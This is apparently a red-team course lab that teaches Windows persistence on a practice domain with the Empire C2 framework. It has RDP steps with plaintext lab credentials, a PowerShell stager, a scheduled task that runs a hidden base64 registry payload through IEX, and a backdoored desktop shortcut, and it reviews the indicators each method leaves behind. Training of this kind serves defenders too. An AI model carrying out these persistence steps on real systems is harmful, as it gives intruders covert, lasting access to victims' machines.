Skip to content

Lab 3.4 - Persistence

Objectives

  • Establish persistence on wk01.draconem.corp with two methods
  • Create a Scheduled Task using a persistence module
  • Examine the Indicators of Compromise (IoC) from that module
  • Create a shortcut, .lnk file, on the user's desktop
  • Backdoor the shortcut, .lnk file, using a persistence module

In this lab we will establish persistence on the target system then take note of the IoCs that are created to establish that persistence.

TTPs Emulated in this Lab

Preparation

Preparation Steps

Ensure you are connected to the VPN and can ping from the Slingshot Linux VM to the draconem.io website.

Open a terminal on Slingshot. Connect to the VPN with openvpn and take note of your ip address:

sudo openvpn ~/Desktop/sec565-labs-range.ovpn

Ctrl+Shift+t to open a new terminal tab, then run the following command to create four ICMP packets :

ping -c 4 draconem.io

If you get a successful ping, then curl the website. The ping tests icmp while the curl tests dns, tcp, and http.

curl draconem.io | head

On Your Own

1. Create an Empire listener

2. Create a PowerShell stager

3. Execute stager on wk01.draconem.io

4. Establish persistence with Scheduled Tasks

5. Examine IoCs

6. Create Shortcut to backdoor

7. Establish persistence with backdoored .LNK

8. Examine IoCs

9. Review the walkthrough

Walkthrough

Launch Empire and Starkiller

1. Launch Empire and start an http listener on port 8080 for your tun0 interface. If you run into any issues refer back to Lab 2.1 - C2 Introduction with Empire

Create PowerShell Stager

2. Create an Empire stager. Click on the suitcase icon on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.

Select multi/launcher in the drop down menu. Then provide the following values:

  • StarkillerName: interactive-http-pwsh
  • Listener: interactive-http
  • Language: powershell

Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.

Operational Security

3. For the sake of time and to remove barriers, this lab will have you RDP directly to the target system with user credentials discovered in a previous lab. In real engagements you would take the following into consideration.

  • RDP will not be accessible directly to workstations from outside the network
  • A redirector must be used
  • Interaction with wk01 should go through a pivot, but then outbound connections can be go direct to the redirector

Execute Stager on wk01.draconem.io

4. Deliver your stager to wk01.draconem.corp via RDP. Establish an RDP session to the wk01 Windows instance, using the credentials mark.goodwin : C@v3t3Dr@c0n3m!!. We will use xfreerdp on our Slingshot Linux VM with the clipboard plugin so that we can paste our stager into a command prompt. Once you get your agent, leave your RDP session open.

xfreerdp +clipboard /u:mark.goodwin /p:'C@v3t3Dr@c0n3m!!' /v:wk01.draconem.corp

On Slingshot, navigate to the Stagers dashboard, click the three vertical dots icon under actions to bring up the actions menu. Click Copy to Clipboard. Then paste into a command prompt on the Windows system.

Establish Persistence with Scheduled Tasks

5. Interact with your agent, select powershell/persistence/userland/schtasks from the Execute Module drop down list. Then enter the following values:

  • IdleTime: 10
  • Listener: interactive-http

Then click the SUBMIT button.

Examine IoCs

6. Now lets examine our indicators of compromise. Interact with your agent, select csharp/GhostPack/Seatbelt from the Execute Module drop down list. Then enter the following values:

  • Command: ScheduledTasks

Then click the SUBMIT button.

7. Examine the output and notice the new scheduled task was created. The task will execute PowerShell and the arguments are to pull a base64 blob from the registry. This should look suspicious to you! If it does, remember that it will look extra suspicious to a Defender.

====== ScheduledTasks ======

Non Microsoft scheduled tasks (via WMI)

  Name                              :   Updater
  Principal                         :
      GroupId                       :
      Id                            :   Author
      LogonType                     :   Network
      RunLevel                      :   TASK_RUNLEVEL_LUA
      UserId                        :   Mark.Goodwin
  Author                            :   DRACONEM\Mark.Goodwin
  Description                       :
  Source                            :
  State                             :   Ready
  SDDL                              :
  Enabled                           :   True
  Date                              :   3/19/2022 8:01:39 PM
  AllowDemandStart                  :   True
  DisallowStartIfOnBatteries        :   True
  ExecutionTimeLimit                :   PT72H
  StopIfGoingOnBatteries            :   True
  Actions                           :
      ------------------------------
      Type                          :   MSFT_TaskAction
      Arguments                     :   -NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"
      Execute                       :   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      ------------------------------
  Triggers                          :
      ------------------------------
      Type                          :   MSFT_TaskIdleTrigger
      Enabled                       :   True
      StartBoundary                 :   2022-03-19T20:01:00
      StopAtDurationEnd             :   False
      ------------------------------

8. Now let's look at that registry value. Interact with your agent, select csharp/SharpSploit.Enumeration/GetRegistryKey from the Execute Module drop down list. Then enter the following values:

  • RegPath: HKCU:\Software\Microsoft\Windows\CurrentVersion\debug

Then click the SUBMIT button.

9. Examine the output and notice the base64 blob, let's take a deeper look with the command line. Run the following in a terminal on Slingshot Linux.

echo <Registry Value> | base64 -d
echo <Still encoded value> | base64 -d

10. The take away here, is that in order to establish this type of persistence in userland, you have to leave some IoCs behind. Check your operational security posture and weigh the risks and benefits of establishing this persistence. If you do create IoCs, they must be documented by the team and removed at the end of the engagement, if not sooner.

Tip

Red Team Tip: Don't use default values in Red Team engagements. This module's defaults should be signatured by more mature organizations because the TTP is widely used and publicly available. Changing the defaults doesn't always get around security tools but it can help tremendously!

Create Shortcut to Backdoor

11. In your RDP session, Right Click on the Desktop -> New -> Shortcut.

Then enter the following values for the shortcut:

  • Type the location of the item: C:\Program Files\internet explorer\iexplore.exe

Click Next.

  • Type a name for this shortcut: Internet Explorer

Click Finish.

12. Double Click the shortcut to verify that it works.

13. Download the .lnk file with your agent. Click the download icon in Starkiller and enter the value \\fs01.draconem.corp\Folders$\mark.goodwin\Desktop\Internet Explorer.lnk. This is because our user profiles in Draconem get linked to the file share instead of the workstation to enable roaming profiles (a feature commonly observed in enterprises where users don't have a fixed workstation).

14. Examine the link with your terminal by navigating to your agent's download directory and finding the .lnk file. We will use strings to avoid non-printable characters, take note of the shortcut's destination and then make a copy of the original file.

cd /opt/Empire/empire/server/downloads/<%AGENTNAME%>
find . | grep -i .LNK
strings "./fs01.draconem.corp/Folders$/mark.goodwin/Desktop/Internet Explorer.lnk"

sudo mv "./fs01.draconem.corp/Folders$/mark.goodwin/Desktop/Internet Explorer.lnk" "./fs01.draconem.corp/Folders$/mark.goodwin/Desktop/Internet Explorer.lnk.orig"

Establish Persistence with Backdoored .LNK

15. Interact with your agent, select powershell/persistence/userland/backdoor_lnk from the Execute Module drop down list. Then enter the following values:

  • LNKPath: \\fs01.draconem.corp\Folders$\mark.goodwin\Desktop\Internet Explorer.lnk
  • Listener: interactive-http

Then click the SUBMIT button.

Examine IoCs

16. Download the modified .lnk file with your agent. Click the download icon and enter the value \\fs01.draconem.corp\Folders$\mark.goodwin\Desktop\Internet Explorer.lnk.

17. Examine the modified link with your terminal by navigating to your agent's download directory and finding the .lnk file. We will use strings to avoid non-printable ascii characters, take note of the PowerShell hijack in the target of the shortcut.

cd /opt/Empire/empire/server/downloads/<%AGENTNAME%>
find . | grep -i .LNK
strings "./fs01.draconem.corp/Folders$/mark.goodwin/Desktop/Internet Explorer.lnk"

18. The last thing for us to accomplish is to test the shortcut and take note of the IoC for later. Double Click the shortcut in your RDP session. You should see Internet Explorer launch and a new agent in Starkiller.

Conclusion

In this lab we deployed an agent onto wk01.draconem.corp using the credentials we discovered from a previous lab. We wanted to ensure we always have access to this system, we did this by establishing persistence in two different ways. Each method is not "opsec safe", meaning the TTP leaves behind IoCs that could be discovered by a Defender. In order to understand our tools and these techniques we examined the change to the target system after running the persistence modules.